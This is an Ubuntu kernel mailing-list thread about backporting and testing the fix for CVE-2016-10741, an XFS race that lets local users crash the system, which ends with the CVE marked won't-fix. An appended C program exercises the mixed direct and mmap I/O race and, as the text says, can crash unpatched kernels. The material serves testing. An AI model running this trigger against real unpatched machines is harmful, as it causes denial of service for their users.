NACK: [SRU][T][PATCH 0/1] CVE-2016-10741 - Local DoS in XFS

Tyler Hicks tyhicks at canonical.com
Fri Feb 22 10:05:16 UTC 2019


On 2019-02-21 18:23:45, Hui Wang wrote:
> On 2019/2/20 11:06 PM, Tyler Hicks wrote:
> > On 2019-02-20 22:53:29, Hui Wang wrote:
> > > On 2019/2/19 8:48 PM, Tyler Hicks wrote:
> > > > On 2019-02-19 19:32:56, Hui Wang wrote:
> > > > > https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-10741.html
> > > > > 
> > > > > In the Linux kernel before 4.9.3, fs/xfs/xfs_aops.c allows local users to
> > > > > cause a denial of service (system crash) because there is a race condition
> > > > > between direct and memory-mapped I/O (associated with a hole) that is
> > > > > handled with BUG_ON instead of an I/O failure.
> > > > > 
> > > > > This issue is only for the trusty kernel. The original patch context is different
> > > > > from the trusty kernel, so I backported this patch rather than cherry-picking it.
> > > > > 
> > > > > I think the backport is safe since the logic is the same as the original
> > > > > patch (if there are both direct and mapped-I/O accesses to a file at the same
> > > > > time, don't BUG_ON() unconditionally; instead we return EIO or
> > > > > WARN_ON_ONCE() conditionally).
> > > > > 
> > > > > Build test passes.
> > > > > 
> > > > > I generated an xfs filesystem based on a file (dd, mount and mkfs.xfs) and did
> > > > > some basic file operations (generate a new file, write something to
> > > > > this file, read it back from this file, delete this file); everything
> > > > > works fine as before.
> > > > Thanks for working on this fix. Would you be able to run the test
> > > > mentioned in the commit message of the fix?
> > > > 
> > > >     https://git.kernel.org/pub/scm/fs/xfs/xfstests-dev.git/tree/tests/generic/095
> > > > 
> > > > Thanks!
> > > I ran the test case above under the original trusty kernel and could not
> > > reproduce the issue (trigger the BUG_ON(1)). After running the test
> > > case, it hangs somewhere, but I can confirm the hang is not related to
> > > this CVE, since when it hangs, it is not in the function
> > > __xfs_get_blocks(), and I tested the 3.16 and 3.19 kernels (they all have this
> > > CVE issue): none of them hang and none can trigger the BUG_ON(1) in
> > > __xfs_get_blocks().
> > Can you clarify if the test hangs in these situations:
> > 
> > 1) without your backport applied
> > 2) with your backport applied
> > 
> > Tyler
> 
> Apart from this CVE issue, it looks like the trusty kernel also has
> other bugs in fs/xfs that generic/095 hits, and those other bugs are always
> triggered and make the system hang before this CVE issue can be triggered
> when running generic/095, so I have no way to verify the backported
> patch.
> 
> Shall we set this CVE issue to "won't fix" in the trusty kernel?

Yes, I think that's a good idea. This CVE isn't severe enough to warrant
more research at this time.

Tyler

> 
> 
> Regards,
> 
> Hui.
> 
> 
> 
> > > The test steps I did:
> > > 
> > > boot a trusty linux in the kvm
> > > 
> > > dd if=/dev/zero of=./test1.img bs=1M count=100
> > > mkfs.xfs ./test1.img
> > > sudo losetup /dev/loop1 ./test1.img
> > > 
> > > dd if=/dev/zero of=./test.img bs=1M count=100
> > > mkfs.xfs ./test.img
> > > sudo losetup /dev/loop0 ./test.img
> > > 
> > > sudo su
> > > 
> > > export TEST_DIR=/mnt
> > > export TEST_DEV=/dev/loop1
> > > export SCRATCH_MNT=/scrat
> > > export SCRATCH_DEV=/dev/loop0
> > > 
> > > /var/lib/xfstests/check generic/095
> > > 
> > > 
> > > > Tyler
> > > > 
> > > > > Brian Foster (1):
> > > > >     xfs: don't BUG() on mixed direct and mapped I/O
> > > > > 
> > > > >    fs/xfs/xfs_aops.c | 21 ++++++++++++++++++++-
> > > > >    1 file changed, 20 insertions(+), 1 deletion(-)
> > > > > 
> > > > > -- 
> > > > > 2.17.1
> > > > > 
> > > > > 
> > > > > -- 
> > > > > kernel-team mailing list
> > > > > kernel-team at lists.ubuntu.com
> > > > > https://lists.ubuntu.com/mailman/listinfo/kernel-team
> > > 
> 
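The I/O pattern that generic/095 stresses and that the backported fix guards against, as an added example (this is not code from the thread, from xfstests or from the kernel patch, and it is not a confirmed reproducer): a child process write-faults a hole through a shared mapping while the parent issues O_DIRECT reads of the same block. The file path, block size and offsets are assumed values. On a kernel carrying Brian Foster's fix, a read that loses the race fails with EIO and is counted; on an unpatched XFS before 4.9.3 the same race is what trips the BUG_ON() in __xfs_get_blocks() and takes the machine down, so run it only against an XFS mount inside a disposable VM like the KVM setup above. On any other filesystem, or one that rejects O_DIRECT with EINVAL, it merely exercises the pattern without crashing anything.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Assumed layout (example values, not from xfstests): one written block at
 * offset 0, then a hole; the contended block sits inside that hole. */
#define BLOCK       4096
#define HOLE_OFFSET (64 * 1024)
#define FILE_SIZE   (HOLE_OFFSET + 2 * BLOCK)

/* Create a sparse file: one real block at offset 0, a hole up to FILE_SIZE. */
int make_sparse_file(const char *path)
{
    int fd = open(path, O_RDWR | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    char buf[BLOCK];
    memset(buf, 'A', sizeof buf);
    int rc = (pwrite(fd, buf, sizeof buf, 0) == (ssize_t)sizeof buf &&
              ftruncate(fd, FILE_SIZE) == 0) ? 0 : -1;
    close(fd);
    return rc;
}

/* Bytes actually allocated on disk (st_blocks counts 512-byte units); for
 * the sparse file above this stays well below FILE_SIZE. */
long allocated_bytes(const char *path)
{
    struct stat st;
    if (stat(path, &st) < 0)
        return -1;
    return (long)st.st_blocks * 512;
}

/* Child side: write-fault the hole through a shared mapping, then punch it
 * back out so every iteration faults on a hole again. On XFS the fault
 * allocates delalloc blocks in the range the direct reader is mapping. */
static int mmap_writer(const char *path, int iterations)
{
    int fd = open(path, O_RDWR);
    if (fd < 0)
        return 1;
    size_t len = HOLE_OFFSET + BLOCK;
    char *map = mmap(NULL, len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (map == MAP_FAILED) {
        close(fd);
        return 1;
    }
    for (int i = 0; i < iterations; i++) {
        memset(map + HOLE_OFFSET, 'B', BLOCK);   /* write fault into the hole */
        /* Return value ignored on purpose: a filesystem without hole
         * punching just keeps rewriting an allocated block. */
        (void)fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                        HOLE_OFFSET, BLOCK);
    }
    munmap(map, len);
    close(fd);
    return 0;
}

/* Parent side: O_DIRECT reads of the contended block while the child faults
 * it in. Returns 0 when the run completed (EIO from a read, the patched
 * kernel's answer to the race, is counted in *eio_hits), 2 when the
 * filesystem rejects O_DIRECT, 1 on any other failure. */
int run_mixed_io(const char *path, int iterations, int *eio_hits)
{
    *eio_hits = 0;
    int fd = open(path, O_RDONLY | O_DIRECT);
    if (fd < 0)
        return errno == EINVAL ? 2 : 1;
    void *buf;                                   /* O_DIRECT needs alignment */
    if (posix_memalign(&buf, BLOCK, BLOCK) != 0) {
        close(fd);
        return 1;
    }
    pid_t pid = fork();
    if (pid < 0) {
        free(buf);
        close(fd);
        return 1;
    }
    if (pid == 0)
        _exit(mmap_writer(path, iterations));

    int rc = 0;
    for (int i = 0; i < iterations; i++) {
        ssize_t n = pread(fd, buf, BLOCK, HOLE_OFFSET);
        if (n < 0 && errno == EIO) {
            (*eio_hits)++;
        } else if (n < 0) {
            rc = 1;
            break;
        }
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status) || WEXITSTATUS(status) != 0)
        rc = 1;
    free(buf);
    close(fd);
    return rc;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/tmp/mixed_io_example.dat";
    if (make_sparse_file(path) != 0) {
        perror("make_sparse_file");
        return 1;
    }
    int hits = 0;
    int rc = run_mixed_io(path, 1000, &hits);
    printf("rc=%d eio_hits=%d allocated=%ld bytes of %d\n",
           rc, hits, allocated_bytes(path), FILE_SIZE);
    unlink(path);
    return rc == 1;
}
```

Point it at a file on the scratch XFS mount (`./mixed_io /scrat/race.dat`) and let it loop; a non-zero eio_hits on a patched kernel is the EIO path of the fix being exercised, while a zero count proves nothing, which is consistent with the reproduction difficulty described above.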


